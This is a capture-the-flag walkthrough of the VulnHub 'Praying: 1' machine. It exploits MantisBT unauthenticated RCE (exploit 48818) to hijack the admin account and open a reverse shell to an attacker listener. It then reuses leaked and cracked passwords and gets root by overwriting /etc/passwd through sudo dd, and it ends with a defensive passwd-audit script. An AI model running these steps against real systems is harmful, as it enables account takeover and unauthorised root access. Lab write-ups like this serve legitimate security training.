Praying
Author: jason_huawen
Target host basic information
Name: Praying: 1
URL:
https://www.vulnhub.com/entry/praying-1,575/
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/Praying]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.61.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:be:bb:0d 1 60 PCS Systemtechnik GmbH
192.168.56.235 08:00:27:bd:7d:26 1 60 PCS Systemtechnik GmbH
Using the netdiscover tool bundled with Kali Linux, the target host's IP address is identified as 192.168.56.235.
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub/Praying]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.235 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-28 03:46 EST
Nmap scan report for bogon (192.168.56.235)
Host is up (0.00032s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
8888/tcp closed sun-answerbook
MAC Address: 08:00:27:BD:7D:26 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 110.05 seconds
The Nmap scan shows that the target host has one open port, 80 (HTTP).
Get Access
Visiting port 80 returns the Apache default page.
┌──(kali㉿kali)-[~/Vulnhub/Praying]
└─$ nikto -h http://192.168.56.235
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.235
+ Target Hostname: 192.168.56.235
+ Target Port: 80
+ Start Time: 2022-11-28 03:50:49 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5b011df7fecbd, mtime: gzip
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET
+ Cookie MANTIS_STRING_COOKIE created without the httponly flag
+ /composer.json: PHP Composer configuration file reveals configuration information - https://getcomposer.org/
+ /composer.lock: PHP Composer configuration file reveals configuration information - https://getcomposer.org/
+ 8725 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2022-11-28 03:51:41 (GMT-5) (52 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.41) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)?
Nikto found the files /composer.json and /composer.lock; download them locally:
┌──(kali㉿kali)-[~/Vulnhub/Praying]
└─$ curl http://192.168.56.235/composer.json
{
"name": "mantisbt/mantisbt",
"description": "Mantis Bug Tracker",
"type": "project",
"require": {
"slim/slim": "^3.0"
},
"license": "GPL v2",
"authors": [
{
"name": "MantisBT Team",
"email": "[email protected]",
"homepage": "https://www.mantisbt.org"
}
]
}
┌──(kali㉿kali)-[~/Vulnhub/Praying]
└─$ gobuster dir -u http://192.168.56.235 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.235
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/11/28 03:54:21 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 317] [--> http://192.168.56.235/images/]
/library (Status: 301) [Size: 318] [--> http://192.168.56.235/library/]
/doc (Status: 301) [Size: 314] [--> http://192.168.56.235/doc/]
/admin (Status: 301) [Size: 316] [--> http://192.168.56.235/admin/]
/scripts (Status: 301) [Size: 318] [--> http://192.168.56.235/scripts/]
/plugins (Status: 301) [Size: 318] [--> http://192.168.56.235/plugins/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.235/css/]
/core (Status: 301) [Size: 315] [--> http://192.168.56.235/core/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.235/js/]
/api (Status: 301) [Size: 314] [--> http://192.168.56.235/api/]
/lang (Status: 301) [Size: 315] [--> http://192.168.56.235/lang/]
/vendor (Status: 301) [Size: 317] [--> http://192.168.56.235/vendor/]
/config (Status: 301) [Size: 317] [--> http://192.168.56.235/config/]
/fonts (Status: 301) [Size: 316] [--> http://192.168.56.235/fonts/]
/server-status (Status: 403) [Size: 279]
Progress: 217630 / 220561 (98.67%)
===============================================================
2022/11/28 03:54:52 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Praying]
└─$ gobuster dir -u http://192.168.56.235 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.235
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,txt,html,sh
[+] Timeout: 10s
===============================================================
2022/11/28 03:56:14 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/images (Status: 301) [Size: 317] [--> http://192.168.56.235/images/]
/index.html (Status: 200) [Size: 10918]
/search.php (Status: 302) [Size: 0] [--> http://192.168.56.235/login_page.php?return=%2Fsearch.php]
/login.php (Status: 302) [Size: 0] [--> http://192.168.56.235/login_page.php?error=1&username=&return=my_view_page.php]
/library (Status: 301) [Size: 318] [--> http://192.168.56.235/library/]
/view.php (Status: 200) [Size: 4746]
/doc (Status: 301) [Size: 314] [--> http://192.168.56.235/doc/]
/wiki.php (Status: 200) [Size: 4746]
/admin (Status: 301) [Size: 316] [--> http://192.168.56.235/admin/]
/signup.php (Status: 200) [Size: 4808]
/scripts (Status: 301) [Size: 318] [--> http://192.168.56.235/scripts/]
/plugins (Status: 301) [Size: 318] [--> http://192.168.56.235/plugins/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.235/css/]
/core (Status: 301) [Size: 315] [--> http://192.168.56.235/core/]
/core.php (Status: 200) [Size: 0]
/js (Status: 301) [Size: 313] [--> http://192.168.56.235/js/]
/api (Status: 301) [Size: 314] [--> http://192.168.56.235/api/]
/lang (Status: 301) [Size: 315] [--> http://192.168.56.235/lang/]
/vendor (Status: 301) [Size: 317] [--> http://192.168.56.235/vendor/]
/config (Status: 301) [Size: 317] [--> http://192.168.56.235/config/]
/fonts (Status: 301) [Size: 316] [--> http://192.168.56.235/fonts/]
/plugin.php (Status: 200) [Size: 4748]
/verify.php (Status: 200) [Size: 4832]
/main_page.php (Status: 302) [Size: 0] [--> http://192.168.56.235/login_page.php?return=main_page.php]
/news_rss.php (Status: 302) [Size: 0] [--> http://192.168.56.235/login_page.php?return=news_rss.php]
/mantis.php (Status: 302) [Size: 0] [--> http://192.168.56.235/login_page.php]
/file_download.php (Status: 302) [Size: 0] [--> http://192.168.56.235/login_page.php?return=%2Ffile_download.php]
/xmlhttprequest.php (Status: 302) [Size: 0] [--> http://192.168.56.235/login_page.php?return=%2Fxmlhttprequest.php]
/login_page.php (Status: 200) [Size: 5565]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/bug_report.php (Status: 200) [Size: 4808]
/changelog_page.php (Status: 302) [Size: 0] [--> http://192.168.56.235/login_page.php?return=changelog_page.php]
/server-status (Status: 403) [Size: 279]
Progress: 1099799 / 1102805 (99.73%)
===============================================================
2022/11/28 03:58:58 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Praying]
└─$ searchsploit mantis
-------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------- ---------------------------------
Mantis Bug Tracker 0.15.x/0.16/0.17.x - JPGraph Remote File Inclusion Command Execution | php/webapps/21727.txt
Mantis Bug Tracker 0.19 - Remote Server-Side Script Execution | php/webapps/24390.txt
Mantis Bug Tracker 0.19.2/1.0 - 'Bug_sponsorship_list_view_inc.php' File Inclusion | php/webapps/26423.txt
Mantis Bug Tracker 0.x - Multiple Cross-Site Scripting Vulnerabilities | php/webapps/24391.txt
Mantis Bug Tracker 0.x - New Account Signup Mass Emailing | php/webapps/24392.php
Mantis Bug Tracker 0.x/1.0 - 'manage_user_page.php?sort' Cross-Site Scripting | php/webapps/27229.txt
Mantis Bug Tracker 0.x/1.0 - 'view_all_set.php' Multiple Cross-Site Scripting Vulnerabiliti | php/webapps/27228.txt
Mantis Bug Tracker 0.x/1.0 - 'View_filters_page.php' Cross-Site Scripting | php/webapps/26798.txt
Mantis Bug Tracker 0.x/1.0 - Multiple Input Validation Vulnerabilities | php/webapps/26172.txt
Mantis Bug Tracker 1.1.1 - Code Execution / Cross-Site Scripting / Cross-Site Request Forge | php/webapps/5657.txt
Mantis Bug Tracker 1.1.3 - 'manage_proj_page' PHP Code Execution (Metasploit) | php/remote/44611.rb
Mantis Bug Tracker 1.1.3 - Remote Code Execution | php/webapps/6768.txt
Mantis Bug Tracker 1.1.8 - Cross-Site Scripting / SQL Injection | php/webapps/36068.txt
Mantis Bug Tracker 1.2.0a3 < 1.2.17 XmlImportExport Plugin - PHP Code Injection (Metasploit | multiple/webapps/41685.rb
Mantis Bug Tracker 1.2.0a3 < 1.2.17 XmlImportExport Plugin - PHP Code Injection (Metasploit | php/remote/35283.rb
Mantis Bug Tracker 1.2.19 - Host Header | php/webapps/38068.txt
Mantis Bug Tracker 1.2.3 - 'db_type' Cross-Site Scripting / Full Path Disclosure | php/webapps/15735.txt
Mantis Bug Tracker 1.2.3 - 'db_type' Local File Inclusion | php/webapps/15736.txt
Mantis Bug Tracker 1.3.0/2.3.0 - Password Reset | php/webapps/41890.txt
Mantis Bug Tracker 1.3.10/2.3.0 - Cross-Site Request Forgery | php/webapps/42043.txt
Mantis Bug Tracker 2.24.3 - 'access' SQL Injection | php/webapps/49340.py
Mantis Bug Tracker 2.3.0 - Remote Code Execution (Unauthenticated) | php/webapps/48818.py
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Select the last exploit in the list:
┌──(kali㉿kali)-[~/Vulnhub/Praying]
└─$ searchsploit -m php/webapps/48818.py
Exploit: Mantis Bug Tracker 2.3.0 - Remote Code Execution (Unauthenticated)
URL: https://www.exploit-db.com/exploits/48818
Path: /usr/share/exploitdb/exploits/php/webapps/48818.py
File Type: Python script, ASCII text executable
Copied to: /home/kali/Vulnhub/Praying/48818.py
┌──(kali㉿kali)-[~/Vulnhub/Praying]
└─$ mv 48818.py exploit.py
Modify exploit.py as shown below:
self.s = requests.Session()
self.headers = dict() # Initialize the headers dictionary
self.RHOST = "192.168.56.235" # Victim IP
self.RPORT = "80" # Victim port
self.LHOST = "192.168.56.206" # Attacker IP
self.LPORT = "5555" # Attacker Port
self.verify_user_id = "1" # User id for the target account
self.realname = "administrator" # Username to hijack
self.passwd = "password" # New password after account hijack
self.mantisLoc = "/" # Location of mantis in URL
Run exploit.py:
┌──(kali㉿kali)-[~/Vulnhub/Praying]
└─$ python2 exploit.py
Successfully hijacked account!
Successfully logged in!
Triggering reverse shell
Cleaning up
Deleting the dot_tool config.
Deleting the relationship_graph_enable config.
Successfully cleaned up
┌──(kali㉿kali)-[~/Vulnhub/Praying]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.235] 55214
bash: cannot set terminal process group (703): Inappropriate ioctl for device
bash: no job control in this shell
www-data@praying:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@praying:/var/www/html$
We obtained a shell on Kali Linux.
Privilege escalation
www-data@praying:/var/www/redmine/redmine-4.1.1/config$ cat database.yml
cat database.yml
# Default setup is given for MySQL 5.7.7 or later.
# Examples for PostgreSQL, SQLite3 and SQL Server can be found at the end.
# Line indentation must be 2 spaces (no tabs).
production:
adapter: mysql2
database: redmine
host: localhost
username: projman
password: "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
# Use "utf8" instead of "utfmb4" for MySQL prior to 5.7.7
encoding: utf8mb4
development:
adapter: mysql2
database: redmine_development
host: localhost
username: root
password: ""
# Use "utf8" instead of "utfmb4" for MySQL prior to 5.7.7
encoding: utf8mb4
# Warning: The database defined as "test" will be erased and
# re-generated from your development database when you run "rake".
# Do not set this db to the same as development or production.
test:
adapter: mysql2
database: redmine_test
host: localhost
username: root
password: ""
# Use "utf8" instead of "utfmb4" for MySQL prior to 5.7.7
encoding: utf8mb4
# PostgreSQL configuration example
#production:
# adapter: postgresql
# database: redmine
# host: localhost
# username: postgres
# password: "postgres"
# SQLite3 configuration example
#production:
# adapter: sqlite3
# database: db/redmine.sqlite3
# SQL Server configuration example
#production:
# adapter: sqlserver
# database: redmine
# host: localhost
# username: jenkins
# password: jenkins
www-data@praying:/var/www/redmine/redmine-4.1.1/config$
www-data@praying:/var/www/redmine/redmine-4.1.1/config$ su projman
su projman
Password: !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
id
uid=1002(projman) gid=1002(projman) groups=1002(projman)
We found projman's password and switched to that user:
projman@praying:~$ ls -alh
ls -alh
total 36K
drwx------ 5 projman projman 4.0K Sep 26 2020 .
drwxr-xr-x 6 root root 4.0K Sep 24 2020 ..
lrwxrwxrwx 1 projman projman 9 Sep 24 2020 .bash_history -> /dev/null
-rw-r--r-- 1 projman projman 220 Sep 24 2020 .bash_logout
-rw-r--r-- 1 projman projman 3.7K Sep 24 2020 .bashrc
drwx------ 2 projman projman 4.0K Sep 24 2020 .cache
drwxrwxr-x 3 projman projman 4.0K Sep 24 2020 .local
-rw-r--r-- 1 projman projman 33 Sep 24 2020 .part1
-rw-r--r-- 1 projman projman 807 Sep 24 2020 .profile
drwx------ 2 projman projman 4.0K Sep 26 2020 .ssh
projman@praying:~$ cat .part1
cat .part1
4914CACB6C089C74AEAEB87497AF2FBA
projman@praying:~$
This may be a user's password.
┌──(kali㉿kali)-[~/Vulnhub/Praying]
└─$ hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# [email protected] #
#########################################################################
--------------------------------------------------
HASH: 4914CACB6C089C74AEAEB87497AF2FBA
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
Cracked with an online site: tequieromucho
We know the target host has the following users:
root
developer
elevate
mantis
projman
Try the cracked password against the different users:
projman@praying:/home$ su - developer
su - developer
Password: tequieromucho
id
id
su: Authentication failure
projman@praying:/home$ id
uid=1002(projman) gid=1002(projman) groups=1002(projman)
projman@praying:/home$ su - elevate
su - elevate
Password: tequieromucho
elevate@praying:~$ id
id
uid=1003(elevate) gid=1003(elevate) groups=1003(elevate)
elevate@praying:~$
elevate@praying:~$ sudo -l
sudo -l
[sudo] password for elevate: tequieromucho
Matching Defaults entries for elevate on praying:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User elevate may run the following commands on praying:
(ALL : ALL) /usr/bin/dd
elevate@praying:~$
Use dd for privilege escalation: copy /etc/passwd over, then clear root's password field (the x) in the copy. Editing with nano or vi produces garbled characters in this shell, so use sed to make the edit:
elevate@praying:~$ cp /etc/passwd passwd
cp /etc/passwd passwd
elevate@praying:~$ sed -i '1c root::0:0:root:/root:/bin/bash' passwd
sed -i '1c root::0:0:root:/root:/bin/bash' passwd
elevate@praying:~$ cat passwd
cat passwd
root::0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mantis:x:1000:1000:praying:/home/mantis:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:112:118:MySQL Server,,,:/nonexistent:/bin/false
tinyproxy:x:113:119:Tinyproxy daemon:/run/tinyproxy:/bin/false
developer:x:1001:1001:,,,:/home/developer:/bin/bash
projman:x:1002:1002:,,,:/home/projman:/bin/bash
elevate:x:1003:1003:,,,:/home/elevate:/bin/bash
Then write it back to /etc/passwd with dd:
elevate@praying:~$ sudo /usr/bin/dd if=passwd of=/etc/passwd
sudo /usr/bin/dd if=passwd of=/etc/passwd
[sudo] password for elevate: tequieromucho
3+1 records in
3+1 records out
2027 bytes (2.0 kB, 2.0 KiB) copied, 0.000190023 s, 10.7 MB/s
elevate@praying:~$ su - root
su - root
root@praying:~# cd /root
cd /root
root@praying:~# ls
ls
message part2 root.txt snap
root@praying:~# cat root.txt
cat root.txt
[root.txt: ASCII-art banner, not reproducible as text]
https://www.youtube.com/watch?v=T1XgFsitnQw
root@praying:~#
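A defender-side check for the /etc/passwd tampering performed above, added here as an example that is not part of the original writeup: it parses a passwd image and flags empty password fields (the root::0:0:... line that lets su - root succeed with no password), UID 0 accounts other than root, and hashes stored outside /etc/shadow. The sample entries are constructed from the listing above.

```python
"""Audit an /etc/passwd image for the tampering shown in this writeup.

Added example, not part of the original walkthrough. After the dd write,
root's password field is empty, so `su - root` succeeds without a password.
This check flags that condition plus two related ones a defender wants to
catch: a second UID 0 account, and a hash sitting directly in /etc/passwd
instead of the usual 'x' pointer into /etc/shadow.
"""
from dataclasses import dataclass
from typing import List

# Values that legitimately appear in the second field of /etc/passwd.
SHADOW_MARKERS = {"x", "*", "!", "!!"}


@dataclass
class Finding:
    user: str
    issue: str


def audit_passwd(text: str) -> List[Finding]:
    """Return one Finding per suspicious entry in the given passwd text."""
    findings: List[Finding] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(Finding(f"<line {lineno}>", "malformed entry: expected 7 fields"))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if pw == "":
            findings.append(Finding(name, "empty password field: account logs in without a password"))
        elif pw not in SHADOW_MARKERS:
            findings.append(Finding(name, "password hash stored in /etc/passwd instead of /etc/shadow"))
        if uid == "0" and name != "root":
            findings.append(Finding(name, "UID 0 account other than root"))
    return findings


# Constructed samples: the first line reproduces the modified root entry from
# the writeup; the other lines are ordinary Ubuntu entries from the same listing.
TAMPERED_PASSWD = """\
root::0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
elevate:x:1003:1003:,,,:/home/elevate:/bin/bash
"""

# The same image with root's field restored to the shadow pointer.
CLEAN_PASSWD = TAMPERED_PASSWD.replace("root::0:0:", "root:x:0:0:", 1)

if __name__ == "__main__":
    for f in audit_passwd(TAMPERED_PASSWD):
        print(f"{f.user}: {f.issue}")
```

On a live host the same function can be fed the contents of /etc/passwd from a cron job or a file-integrity monitor; any finding on the root entry is an immediate incident indicator.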
Lessons learned
- In fact, the exploit code chosen at the start was the right one, but it had to be modified to match the target host; the modification was done incorrectly, which caused the exploit to fail.